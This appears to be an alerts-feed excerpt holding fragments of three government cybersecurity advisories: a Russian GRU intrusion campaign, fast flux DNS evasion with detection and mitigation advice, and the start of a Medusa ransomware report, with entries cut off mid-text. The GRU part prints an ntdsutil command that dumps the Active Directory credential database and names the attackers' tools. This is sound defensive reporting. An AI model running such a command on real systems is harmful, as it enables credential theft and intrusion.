title="T1566">T1566</a>]</li> <li>Outlook NTLM vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-23397" target="_blank" title="CVE-2023-23397">CVE-2023-23397</a>)</li> <li>Roundcube vulnerabilities (<a href="https://nvd.nist.gov/vuln/detail/CVE-2020-12641" target="_blank" title="CVE-2020-12641">CVE-2020-12641</a>, <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-35730" target="_blank" title="CVE-2020-35730">CVE-2020-35730</a>, <a href="https://nvd.nist.gov/vuln/detail/CVE-2021-44026" target="_blank" title="CVE-2021-44026">CVE-2021-44026</a>)</li> <li>Exploitation of Internet-facing infrastructure, including corporate VPNs [<a href="https://attack.mitre.org/versions/v17/techniques/T1133/" target="_blank" title="T1133">T1133</a>], via public vulnerabilities and SQL injection [<a href="https://attack.mitre.org/versions/v17/techniques/T1190/" target="_blank" title="T1190">T1190</a>]</li> <li>Exploitation of WinRAR vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-38831" target="_blank" title="CVE-2023-38831">CVE-2023-38831</a>)</li> </ul> <p>The actors abused vulnerabilities associated with a range of brands and models of small office/home office (SOHO) devices to facilitate covert cyber operations, as well as proxy malicious activity via devices with geolocation in proximity to the target [<a href="https://attack.mitre.org/versions/v17/techniques/T1665/" target="_blank" title="T1665">T1665</a>]. [<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited2" title="2">2</a>]</p> <h3>Credential Guessing/Brute Force</h3> <p>Unit 26165 actors’ credential guessing [<a href="https://attack.mitre.org/versions/v17/techniques/T1110/001/" target="_blank" title="T1110.001">T1110.001</a>] operations in this campaign exhibit some similar characteristics to those disclosed in the previous CSA “<a href="https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/0/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF" target="_blank" title="Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments">Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments</a>.”&nbsp;[<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited3" title="3">3</a>] Based on victim network investigations, the current iteration of this TTP employs a similar blend of anonymization infrastructure, including the use of Tor and commercial VPNs [<a href="https://attack.mitre.org/versions/v17/techniques/T1090/003/" target="_blank" title="T1090.003">T1090.003</a>]. The actors frequently rotated the IP addresses used to further hamper detection. All observed connections were made via encrypted TLS [<a href="https://attack.mitre.org/versions/v17/techniques/T1573/" target="_blank" title="T1573">T1573</a>].&nbsp;</p> <h3>Spearphishing</h3> <p>GRU unit 26165 actors’ spearphishing emails included links [<a href="https://attack.mitre.org/versions/v17/techniques/T1566/002/" target="_blank" title="T1566.002">T1566.002</a>] leading to fake login pages impersonating a variety of government entities and Western cloud email providers’ webpages. These webpages were typically hosted on free third-party services or compromised SOHO devices and often used legitimate documents associated with thematically similar entities as lures. The subjects of spearphishing emails were diverse and ranged from professional topics to adult themes. Phishing emails were frequently sent via compromised accounts or free webmail accounts [<a href="https://attack.mitre.org/versions/v17/techniques/T1586/002/" target="_blank" title="T1586.002">T1586.002</a>, <a href="https://attack.mitre.org/versions/v17/techniques/T1586/003/" target="_blank" title="T1586.003">T1586.003</a>]. The emails were typically written in the target’s native language and sent to a single targeted recipient.&nbsp;</p> <p>Some campaigns employed multi-stage redirectors [<a href="https://attack.mitre.org/versions/v17/techniques/T1104/" target="_blank" title="T1104">T1104</a>] verifying IP-geolocation [<a href="https://attack.mitre.org/versions/v17/techniques/T1627/001/" target="_blank" title="T1627.001">T1627.001</a>] and browser fingerprints [<a href="https://attack.mitre.org/versions/v17/techniques/T1627/001/" target="_blank" title="T1627">T1627</a>] to protect credential harvesting infrastructure or provide multifactor authentication (MFA) [<a href="https://attack.mitre.org/versions/v17/techniques/T1111/" target="_blank" title="T1111">T1111</a>] and CAPTCHA relaying capabilities [<a href="https://attack.mitre.org/versions/v17/techniques/T1056/" target="_blank" title="T1056">T1056</a>]. Connecting endpoints failing the location checks were redirected to a benign URL [<a href="https://attack.mitre.org/versions/v17/techniques/T1627/001/" target="_blank" title="T1627">T1627</a>], such as msn.com. Redirector services used include:</p> <ul> <li>Webhook[.]site</li> <li>FrgeIO</li> <li>InfinityFree</li> <li>Dynu</li> <li>Mocky</li> <li>Pipedream</li> <li>Mockbin[.]org</li> </ul> <p>The actors also used spearphishing to deliver malware (including HEADLACE and MASEPIE) executables [<a href="https://attack.mitre.org/versions/v17/techniques/T1204/002/" target="_blank" title="T1204.002">T1204.002</a>] delivered via third-party services and redirectors [<a href="https://attack.mitre.org/versions/v17/techniques/T1566/002/" target="_blank" title="T1566.002">T1566.002</a>], scripts in a mix of languages [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/" target="_blank" title="T1059">T1059</a>] (including BAT [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/003/" target="_blank" title="T1059.003">T1059.003</a>] and VBScript [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/005/" target="_blank" title="T1059.005">T1059.005</a>]) and links to hosted shortcuts [<a href="https://attack.mitre.org/versions/v17/techniques/T1204/001/" target="_blank" title="T1204.001">T1204.001</a>].</p> <h3>CVE Usage</h3> <p>Throughout this campaign, GRU unit 26165 weaponized an Outlook NTLM vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-23397" target="_blank" title="CVE-2023-23397">CVE-2023-23397</a>) to collect NTLM hashes and credentials via specially crafted Outlook calendar appointment invitations [<a href="https://d3fend.mitre.org/technique/d3f:EncryptedTunnels/" target="_blank" title="T1187">T1187</a>]. [<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited4" title="4">4</a>],[<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited5" title="5">5</a>] These actors also used a series of Roundcube CVEs (<a href="https://nvd.nist.gov/vuln/detail/CVE-2020-12641" target="_blank" title="CVE-2020-12641">CVE-2020-12641</a>, <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-35730" target="_blank" title="CVE-2020-35730">CVE-2020-35730</a>, and <a href="https://nvd.nist.gov/vuln/detail/CVE-2021-44026" target="_blank" title="CVE-2021-44026">CVE-2021-44026</a>) to execute arbitrary shell commands [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/005/" target="_blank" title="T1059">T1059</a>], gain access to victim email accounts, and retrieve sensitive data from email servers [<a href="https://attack.mitre.org/versions/v17/techniques/T1114/" target="_blank" title="T1114">T1114</a>].</p> <p>Since at least fall 2023, the actors leveraged a WinRAR vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-38831" target="_blank" title="CVE-2023-38831">CVE-2023-38831</a>) allowing for the execution of arbitrary code embedded in an archive as a means of initial access [<a href="https://attack.mitre.org/versions/v17/techniques/T1659/" target="_blank" title="T1659">T1659</a>]. The actors sent emails with malicious attachments [<a href="https://attack.mitre.org/versions/v17/techniques/T1566/001/" target="_blank" title="T1566.001">T1566.001</a>] or embedded hyperlinks [<a href="https://attack.mitre.org/versions/v17/techniques/T1566/002/" target="_blank" title="T1566.002">T1566.002</a>] that downloaded a malicious archive prepared using this CVE.&nbsp;</p> <h3>Post-Compromise TTPs</h3> <p>After an initial compromise using one of the above techniques, unit 26165 actors conducted contact information reconnaissance to identify additional targets in key positions [<a href="https://attack.mitre.org/versions/v17/techniques/T1589/002/" target="_blank" title="T1589.002">T1589.002</a>]. The actors also conducted reconnaissance of the cybersecurity department [<a href="https://attack.mitre.org/versions/v17/techniques/T1591/" target="_blank" title="T1591">T1591</a>], individuals responsible for coordinating transport [<a href="https://attack.mitre.org/versions/v17/techniques/T1591/004/" target="_blank" title="T1591.004">T1591.004</a>], and other companies cooperating with the victim entity [<a href="https://attack.mitre.org/versions/v17/techniques/T1591/002/" target="_blank" title="T1591.002">T1591.002</a>].</p> <p>The actors used native commands and open source tools, such as Impacket and PsExec, to move laterally within the environment [<a href="https://attack.mitre.org/versions/v17/tactics/TA0008/" target="_blank" title="TA0008">TA0008</a>]. Multiple Impacket scripts were used as .exe files, in addition to the python versions, depending on the victim environment. The actors also moved laterally within the network using Remote Desktop Protocol (RDP) [<a href="https://attack.mitre.org/versions/v17/techniques/T1021/001/" target="_blank" title="T1021.001">T1021.001</a>] to access additional hosts and attempt to dump Active&nbsp;Directory NTDS.dit domain databases [<a href="https://attack.mitre.org/versions/v17/techniques/T1003/003/" target="_blank" title="T1003.003">T1003.003</a>] using native Active Directory Domain Services commands, such as in&nbsp;Figure 2: Example Active Directory Domain Services command:</p> <div> <p><code>C:\Windows\system32\ntdsutil.exe "activate instance ntds" ifm "create full C:\temp\[a-z]{3}" quit quit</code></p> </div> <p>Figure 2: Example Active Directory Domain Services command</p> <p>Additionally, GRU unit 26165 actors used the tools Certipy and ADExplorer.exe to exfiltrate information from the Active Directory. The actors installed python [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/006/" target="_blank" title="T1059.006">T1059.006</a>] on infected machines to enable the execution of Certipy. Accessed files were archived in .zip files prior to exfiltration [<a href="https://attack.mitre.org/versions/v17/techniques/T1560/" target="_blank" title="T1560">T1560</a>]. The actors attempted to exfiltrate archived data via a previously dropped OpenSSH binary [<a href="https://attack.mitre.org/versions/v17/techniques/T1048/" target="_blank" title="T1048">T1048</a>].</p> <p>Incident response investigations revealed that the actors would take steps to locate and exfiltrate lists of Office 365 users and set up sustained email collection. The actors used manipulation of mailbox permissions [<a href="https://attack.mitre.org/versions/v17/techniques/T1098/002/" target="_blank" title="T1098.002">T1098.002</a>] to establish sustained email collection at compromised logistics entities, as detailed in a Polish Cybercommand blog. [<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited6" title="6">6</a>]</p> <p>After initial authentication, unit 26165 actors would change accounts' folder permissions and enroll compromised accounts in MFA mechanisms to increase the trust-level of compromised accounts and enable sustained access [<a href="https://attack.mitre.org/versions/v17/techniques/T1556/006/" target="_blank" title="T1556.006">T1556.006</a>]. The actors leveraged python scripts to retrieve plaintext passwords via Group Policy Preferences [<a href="https://attack.mitre.org/versions/v17/techniques/T1552/006/" target="_blank" title="T1552.006">T1552.006</a>] using Get-GPPPassword.py and a modified ldap-dump.py to enumerate the Windows environment [<a href="https://attack.mitre.org/versions/v17/techniques/T1087/002/" target="_blank" title="T1087.002">T1087.002</a>] and conduct a brute force password spray [<a href="https://attack.mitre.org/versions/v17/techniques/T1110/003/" target="_blank" title="T1110.003">T1110.003</a>] via Lightweight Directory Access Protocol (LDAP). The actors would additionally delete event logs through the wevtutil utility [<a href="https://attack.mitre.org/versions/v17/techniques/T1070/001/" target="_blank" title="T1070.001">T1070.001</a>].</p> <p>After gaining init Fast Flux: A National Security Threat https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-093a US-CERT Alerts urn:uuid:779616ff-495a-d97c-0d50-b880f7cb4083 Tue, 01 Apr 2025 19:00:21 +0000 <h2><strong>Executive summary</strong></h2> <p>Many networks have a gap in their defenses for detecting and blocking a malicious technique known as “fast flux.” This technique poses a significant threat to national security, enabling malicious cyber actors to consistently evade detection. Malicious cyber actors, including cybercriminals and nation-state actors, use fast flux to obfuscate the locations of malicious servers by rapidly changing Domain Name System (DNS) records. Additionally, they can create resilient, highly available command and control (C2) infrastructure, concealing their subsequent malicious operations. This resilient and fast changing infrastructure makes tracking and blocking malicious activities that use fast flux more difficult.&nbsp;</p> <p>The National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), Canadian Centre for Cyber Security (CCCS), and New Zealand National Cyber Security Centre (NCSC-NZ) are releasing this joint cybersecurity advisory (CSA) to warn organizations, Internet service providers (ISPs), and cybersecurity service providers of the ongoing threat of fast flux enabled malicious activities as a defensive gap in many networks. This advisory is meant to encourage service providers, especially Protective DNS (PDNS) providers, to help mitigate this threat by taking proactive steps to develop accurate, reliable, and timely fast flux detection analytics and blocking capabilities for their customers. This CSA also provides guidance on detecting and mitigating elements of malicious fast flux&nbsp;by adopting a multi-layered approach that combines DNS analysis, network monitoring, and threat intelligence.&nbsp;</p> <p>The authoring agencies recommend all stakeholders—government and providers—collaborate to develop and implement scalable solutions to close this ongoing gap in network defenses against malicious fast flux activity.</p> <p>Download the PDF version of this report: <a href="https://media.defense.gov/2025/Apr/02/2003681172/-1/-1/0/CSA-FAST-FLUX.PDF">Fast Flux: A National Security Threat</a> (PDF, 841 KB).</p> <h2><strong>Technical details</strong></h2> <p>When malicious cyber actors compromise devices and networks, the malware they use needs to “call home” to send status updates and receive further instructions. To decrease the risk of detection by network defenders, malicious cyber actors use dynamic resolution techniques, such as fast flux, so their communications are less likely to be detected as malicious and blocked.&nbsp;</p> <p>Fast flux refers to a domain-based technique that is characterized by rapidly changing the DNS records (e.g., IP addresses) associated with a single domain [<a href="https://attack.mitre.org/versions/v16/techniques/T1568/001/" target="_blank" title="Dynamic Resolution: Fast Flux DNS">T1568.001</a>].&nbsp;</p> <h3><strong>Single and double flux</strong></h3> <p>Malicious cyber actors use two common variants of fast flux to perform operations:</p> <p><strong>1. </strong>Single flux: A single domain name is linked to numerous IP addresses, which are frequently rotated in DNS responses. This setup ensures that if one IP address is blocked or taken down, the domain remains accessible through the other IP addresses. See Figure 1 as an example to illustrate this technique.</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2025-04/Single%20flux%20technique.png?itok=pqu33cFW" width="1024" height="511" alt="Illustration of single flux technique, where a single domain name is linked to numerous IP addresses, which are frequently rotated in DNS responses. "> </div> <figcaption class="c-figure__caption">Figure 1: Single flux technique.</figcaption> </figure> <p><strong>Note:</strong> This behavior can also be used for legitimate purposes for performance reasons in dynamic hosting environments, such as in content delivery networks and load balancers.</p> <p><strong>2. </strong>Double flux: In addition to rapidly changing the IP addresses as in single flux, the DNS name servers responsible for resolving the domain also change frequently. This provides an additional layer of redundancy and anonymity for malicious domains. Double flux techniques have been observed using both Name Server (NS) and Canonical Name (CNAME) DNS records. See Figure 2 as an example to illustrate this technique.</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2025-04/Double%20flux%20technique.png?itok=0Cs4NL_u" width="1024" height="600" alt="Infographic of double flux technique, where In addition to rapidly changing the IP addresses as in single flux, the DNS name servers responsible for resolving the domain also change frequently. "> </div> <figcaption class="c-figure__caption">Figure 2: Double flux technique.&nbsp;</figcaption> </figure> <p>Both techniques leverage a large number of compromised hosts, usually as a botnet from across the Internet that acts as proxies or relay points, making it difficult for network defenders to identify the malicious traffic and block or perform legal enforcement takedowns of the malicious infrastructure. Numerous malicious cyber actors have been reported using the fast flux technique to hide C2 channels and remain operational. Examples include:</p> <ul> <li>Bulletproof hosting (BPH) services offer Internet hosting that disregards or evades law enforcement requests and abuse notices. These providers host malicious content and activities while providing anonymity for malicious cyber actors. Some BPH companies also provide fast flux services, which help malicious cyber actors maintain connectivity and improve the reliability of their malicious infrastructure.&nbsp;[1] <ul> <li>Refer to ASD’s ACSC’s <a href="https://www.cyber.gov.au/about-us/view-all-content/publications/bulletproof-hosting-providers" target="_blank" title="&quot;Bulletproof&quot; hosting providers Cracks in the armour of cybercriminal infrastructure">“Bulletproof” hosting providers: Cracks in the armour of cybercriminal infrastructure</a> for more information on BPH providers.&nbsp;[2]</li> </ul> </li> <li>Fast flux has been used in Hive and Nefilim ransomware attacks.&nbsp;[3], [4]</li> <li>Gamaredon uses fast flux to limit the effectiveness of IP blocking.&nbsp;[5], [6], [7]</li> </ul> <p>The key advantages of fast flux networks for malicious cyber actors include:</p> <ul> <li><strong>Increased resilience.</strong> As a fast flux network rapidly rotates through botnet devices, it is difficult for law enforcement or abuse notifications to process the changes quickly and disrupt their services.</li> <li><strong>Render IP blocking ineffective</strong>. The rapid turnover of IP addresses renders IP blocking irrelevant since each IP address is no longer in use by the time it is blocked. This allows criminals to maintain resilient operations.</li> <li><strong>Anonymity</strong>. Investigators face challenges in tracing malicious content back to the source through fast flux networks. This is because malicious cyber actors’ C2 botnets are constantly changing the associated IP addresses throughout the investigation.</li> </ul> <h3><strong>Additional malicious uses</strong></h3> <p>Fast flux is not only used for maintaining C2 communications, it also can play a significant role in phishing campaigns to make social engineering websites harder to block or take down. Phishing is often the first step in a larger and more complex cyber compromise. Phishing is typically used to trick victims into revealing sensitive information (such as login passwords, credit card numbers, and personal data), but can also be used to distribute malware or exploit system vulnerabilities. Similarly, fast flux is&nbsp;used for maintaining high availability for cybercriminal forums and marketplaces, making them resilient against law enforcement takedown efforts.&nbsp;</p> <p>Some BPH providers promote fast flux as a service differentiator that increases the effectiveness of their clients’ malicious activities. For example, one BPH provider posted on a dark web forum&nbsp;that it protects clients from being added to Spamhaus blocklists by easily enabling the fast flux capability through the service management panel&nbsp;(See Figure 3). A customer just needs to add a "dummy server interface," which redirects incoming queries to the host server automatically. By doing so, only the dummy server interfaces are reported for abuse and added to the Spamhaus blocklist, while the servers of the BPH customers remain "clean" and unblocked.&nbsp;</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2025-04/Example%20dark%20web%20fast%20flux%20advertisement.png?itok=NofSWyHu" width="775" height="70" alt="Example of a dark web fast flux advertisement."> </div> <figcaption class="c-figure__caption">Figure 3: Example dark web fast flux advertisement.</figcaption> </figure> <p>The BPH provider further explained that numerous malicious activities beyond C2, including botnet managers, fake shops, credential stealers, viruses, spam mailers, and others, could use fast flux to avoid identification and blocking.&nbsp;</p> <p>As another example, a BPH provider that offers fast flux as a service advertised that it automatically updates name servers to prevent the blocking of customer domains. Additionally, this provider further promoted its use of separate pools of IP addresses for each customer, offering globally dispersed domain registrations for increased reliability.</p> <h2><strong>Detection techniques</strong></h2> <p>The authoring agencies recommend that ISPs and cybersecurity service providers, especially PDNS providers, implement a multi-layered approach, in coordination with customers, using the following techniques to aid in detecting fast flux activity [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#DetectingRelevantThreatsandTTPs3A" title="Detecting Relevant Threats and TTPs (3.A)">CISA CPG 3.A</a>]. However, quickly detecting malicious fast flux activity and differentiating it from legitimate activity remains an ongoing challenge to developing accurate, reliable, and timely fast flux detection analytics.&nbsp;</p> <p><strong>1. </strong>Leverage threat intelligence feeds and reputation services to identify known fast flux domains and associated IP addresses, such as in boundary firewalls, DNS resolvers, and/or SIEM solutions.</p> <p><strong>2. </strong>Implement anomaly detection systems for DNS query logs to identify domains exhibiting high entropy or IP diversity in DNS responses and frequent IP address rotations. Fast flux domains will frequently cycle though tens or hundreds of IP addresses per day.</p> <p><strong>3.</strong> Analyze the time-to-live (TTL) values in DNS records. Fast flux domains often have unusually low TTL values. A typical fast flux domain may change its IP address every 3 to 5 minutes.</p> <p><strong>4.</strong> Review DNS resolution for inconsistent geolocation. Malicious domains associated with fast flux typically generate high volumes of traffic with inconsistent IP-geolocation information.</p> <p><strong>5. </strong>Use flow data to identify large-scale communications with numerous different IP addresses over short periods.</p> <p><strong>6.</strong> Develop&nbsp;fast flux detection algorithms to identify anomalous traffic patterns that deviate from usual network DNS behavior.</p> <p><strong>7.</strong> Monitor for signs of phishing activities, such as suspicious emails, websites, or links, and correlate these with fast flux activity. Fast flux may be used to rapidly spread phishing campaigns and to keep phishing websites online despite blocking attempts.</p> <p><strong>8. </strong>Implement customer transparency and share information about detected fast flux activity, ensuring to alert customers promptly after confirmed presence of malicious activity.</p> <h2><strong>Mitigations</strong></h2> <h3>All organizations</h3> <p>To defend against fast flux, government and critical infrastructure organizations should coordinate with their Internet service providers, cybersecurity service providers, and/or their Protective DNS services to implement the following mitigations utilizing accurate, reliable, and timely fast flux detection analytics.&nbsp;</p> <p><strong>Note:</strong> Some legitimate activity, such as common content delivery network (CDN) behaviors, may look like malicious fast flux activity. Protective DNS services, service&nbsp;providers, and network defenders should make reasonable efforts, such as allowlisting expected CDN services, to avoid blocking or impeding legitimate content.</p> <p><strong>1. </strong>DNS and IP blocking and sinkholing of malicious fast flux domains and IP addresses</p> <ul> <li>Block access to domains identified as using fast flux through non-routable DNS responses or firewall rules.</li> <li>Consider sinkholing the malicious domains, redirecting traffic from those domains to a controlled server to capture and analyze the traffic, helping to identify compromised hosts within the network.</li> <li>Block IP addresses known to be associated with malicious fast flux networks.</li> </ul> <p><strong>2.</strong> Reputational filtering of fast flux enabled malicious activity</p> <ul> <li>Block traffic to and from domains or IP addresses with poor reputations, especially ones identified as participating in malicious fast flux activity.</li> </ul> <p><strong>3. </strong>Enhanced monitoring and logging</p> <ul> <li>Increase logging and monitoring of DNS traffic and network communications to identify new or ongoing fast flux activities.</li> <li>Implement automated alerting mechanisms to respond swiftly to detected fast flux patterns.</li> <li>Refer to ASD’s ACSC joint publication, <a href="https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-monitoring/best-practices-event-logging-threat-detection" target="_blank" title="Best practices for event logging and threat detection">Best practices for event logging and threat detection</a>, for further logging recommendations.</li> </ul> <p><strong>4. </strong>Collaborative defense and information sharing</p> <ul> <li>Share detected fast flux indicators (e.g., domains, IP addresses) with trusted partners and threat intelligence communities to enhance collective defense efforts. Examples of indicator sharing initiatives include CISA’s <a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/information-sharing/automated-indicator-sharing-ais" title="Automated Indicator Sharing">Automated Indicator Sharing</a> or sector-based Information Sharing and Analysis Centers (ISACs) and ASD’s <a href="https://www.cyber.gov.au/about-us/view-all-content/news-and-media/join-the-cyber-threat-intelligence-sharing-service-through-sentinel" target="_blank" title="Cyber Threat Intelligence Sharing Platform">Cyber Threat Intelligence Sharing Platform</a> (CTIS) in Australia.</li> <li>Participate in public and private information-sharing programs to stay informed about emerging fast flux tactics, techniques, and procedures (TTPs). Regular collaboration is particularly important because most malicious activity by these domains occurs within just a few days of their initial use; therefore, early discovery and information sharing by the cybersecurity community is crucial to minimizing such malicious activity. [8]</li> </ul> <p><strong>5. </strong>Phishing awareness and training</p> <ul> <li>Implement employee awareness and training programs to help personnel identify and respond appropriately to phishing attempts.</li> <li>Develop policies and procedures to manage and contain phishing incidents, particularly those facilitated by fast flux networks.</li> <li>For more information on mitigating phishing, see joint <a href="https://www.cisa.gov/resources-tools/resources/phishing-guidance-stopping-attack-cycle-phase-one" title="Phishing Guidance: Stopping the Attack Cycle at Phase One">Phishing Guidance: Stopping the Attack Cycle at Phase One</a>.</li> </ul> <h3>Network defenders</h3> <p>The authoring agencies encourage organizations to use cybersecurity and PDNS services that detect and block fast flux. By leveraging providers that detect fast flux and implement capabilities for DNS and IP blocking, sinkholing, reputational filtering, enhanced monitoring, logging, and collaborative defense of malicious fast flux domains and IP addresses, organizations can mitigate many risks associated with fast flux and maintain a more secure environment.&nbsp;</p> <p>However, some PDNS providers may not detect and block malicious fast flux activities. Organizations should not assume that their PDNS providers block malicious fast flux activity automatically and should contact their PDNS providers to validate coverage of this specific cyber threat.&nbsp;</p> <p>For more information on PDNS services, see the 2021 joint cybersecurity information sheet from NSA and CISA about <a href="https://media.defense.gov/2025/Mar/24/2003675043/-1/-1/0/CSI-SELECTING-A-PROTECTIVE-DNS-SERVICE-V1.3.PDF" target="_blank" title="Selecting a Protective DNS Service">Selecting a Protective DNS Service</a>. [9] In addition, NSA offers no-cost cybersecurity services to Defense Industrial Base (DIB) companies, including a PDNS service. For more information, see NSA’s <a href="https://www.nsa.gov/About/Cybersecurity-Collaboration-Center/DIB-Cybersecurity-Services/" target="_blank" title="DIB Cybersecurity Services">DIB Cybersecurity Services</a> and <a href="https://www.nsa.gov/Portals/75/documents/Cybersecurity/CCC/DIB_Services_NOV2023.pdf" target="_blank" title="National Security Agency Cybersecurity Services">factsheet</a>. CISA also offers a Protective DNS service for federal civilian executive&nbsp;branch (FCEB) agencies. See CISA’s <a href="https://www.cisa.gov/resources-tools/services/protective-domain-name-system-resolver" target="_blank" title="Protective Domain Name System (DNS) Resolver">Protective Domain Name System Resolver</a> page and <a href="https://www.cisa.gov/sites/default/files/2024-08/Protective%20DNS%20Fact%20Sheet%20-%20August%202024.pdf" target="_blank" title="Protective Domain Name System Resolver Service Fact Sheet">factsheet </a>for more information.&nbsp;</p> <h2><strong>Conclusion</strong></h2> <p>Fast flux represents a persistent threat to network security, leveraging rapidly changing infrastructure to obfuscate malicious activity. By implementing robust detection and mitigation strategies, organizations can significantly reduce their risk of compromise by fast flux-enabled threats.&nbsp;</p> <p>The authoring agencies strongly recommend organizations engage their cybersecurity providers on developing a multi-layered approach to detect and mitigate malicious fast flux operations. Utilizing services that detect and block fast flux enabled malicious cyber activity can significantly bolster an organization's cyber defenses.&nbsp;</p> <h2><strong>Works cited</strong></h2> <p>[1] Intel471. Bulletproof Hosting: A Critical Cybercriminal Service. 2024. <a href="https://intel471.com/blog/bulletproof-hosting-a-critical-cybercriminal-service" target="_blank" title="Bulletproof Hosting: A Critical Cybercriminal Service">https://intel471.com/blog/bulletproof-hosting-a-critical-cybercriminal-service</a>&nbsp;</p> <p>[2] Australian Signals Directorate’s Australian Cyber Security Centre. "Bulletproof" hosting providers: Cracks in the armour of cybercriminal infrastructure. 2025.&nbsp;<a href="https://www.cyber.gov.au/about-us/view-all-content/publications/bulletproof-hosting-providers" target="_blank" title="&quot;Bulletproof&quot; hosting providers Cracks in the armour of cybercriminal infrastructure">https://www.cyber.gov.au/about-us/view-all-content/publications/bulletproof-hosting-providers</a>&nbsp;</p> <p>[3] Logpoint. A Comprehensive guide to Detect Ransomware. 2023.&nbsp;<a href="https://www.logpoint.com/wp-content/uploads/2023/04/logpoint-a-comprehensive-guide-to-detect-ransomware.pdf" target="_blank" title="A Comprehensive Guide to Detect Ransomware">https://www.logpoint.com/wp-content/uploads/2023/04/logpoint-a-comprehensive-guide-to-detect-ransomware.pdf</a></p> <p>[4] Trendmicro. Modern Ransomware’s Double Extortion Tactic’s and How to Protect Enterprises Against Them. 2021.&nbsp;<a href="https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/modern-ransomwares-double-extortion-tactics-and-how-to-protect-enterprises-against-them" target="_blank" title="Modern Ransomware's Double Extortion Tactics and How to Protect Enterprises Against Them">https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/modern-ransomwares-double-extortion-tactics-and-how-to-protect-enterprises-against-them</a></p> <p>[5] Unit 42. Russia’s Trident Ursa (aka Gamaredon APT) Cyber Conflict Operations Unwavering Since Invasion of Ukraine. 2022.&nbsp;<a href="https://unit42.paloaltonetworks.com/trident-ursa/" target="_blank" title="Russia’s Trident Ursa (aka Gamaredon APT) Cyber Conflict Operations Unwavering Since Invasion of Ukraine ">https://unit42.paloaltonetworks.com/trident-ursa/</a></p> <p>[6] Recorded Future. BlueAlpha Abuses Cloudflare Tunneling Service for GammaDrop Staging Infrastructure. 2024.&nbsp;<a href="https://www.recordedf #StopRansomware: Medusa Ransomware https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a US-CERT Alerts urn:uuid:c811c34d-f009-8c24-3b7a-2d2849e4d296 Tue, 11 Mar 2025 14:52:42 +0000 <h2><strong>Summary</strong></h2> <p><strong>Note:</strong> This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders detailing various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit <a href="https://www.cisa.gov/stopransomware" title="Stopransomware.gov">stopransomware.gov</a> to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.</p> <p>The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate known Medusa ransomware TTPs and IOCs, identified through FBI investigations as recently as February 2025.&nbsp;</p> <p>Medusa is a ransomware-as-a-service (RaaS) variant first identified in June 2021. As of February 2025, Medusa developers and affiliates have impacted over 300 victims from a variety of critical infrastructure sectors with affected industries including medical, education, legal, insurance, technology, and manufacturing. The Medusa ransomware variant is unrelated to the <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-181a" title="#StopRansomware: MedusaLocker">MedusaLocker</a> variant and the Medusa mobile malware variant per the FBI’s investigation.</p> <p>FBI, CISA, and MS-ISAC encourage organizations to implement the recommendations in the <strong>Mitigations</strong> section of this advisory to reduce the likelihood and impact of Medusa ransomware incidents.</p> <p>Download the PDF version of this report:</p> <p>For a downloadable list of IOCs, see:</p> <a href="https://www.cisa.gov/sites/default/files/2025-03/AA25-071A.stix_.xml" class="c-file__link" target="_blank">AA25-071A STIX XML</a> <span class="c-file__size">(XML, 34.30 KB )</span> <a href="https://www.cisa.gov/sites/default/files/2025-03/AA25-071A-StopRansomware-Medusa-Ransomware.stix_.json" class="c-file__link" target="_blank">AA25-071A STIX JSON</a> <span class="c-file__size">(JSON, 42.28 KB )</span> <h3><strong>Technical Details</strong></h3> <p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v16/matrices/enterprise/" title="Enterprise Matrix">MITRE ATT&amp;CK<sup>®</sup> Matrix for Enterprise</a> framework, version 16. See the <strong>MITRE ATT&amp;CK Tactics and Techniques</strong> section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&amp;CK tactics and techniques.</p> <h3>Background</h3> <p>The RaaS Medusa variant has been used to conduct ransomware attacks from 2021 to present. Medusa originally operated as a closed ransomware variant, meaning all development and associated operations were controlled by the same group of cyber threat actors. While Medusa has since progressed to using an affiliate model, important operations such as ransom negotiation are still centrally controlled by the developers. Both 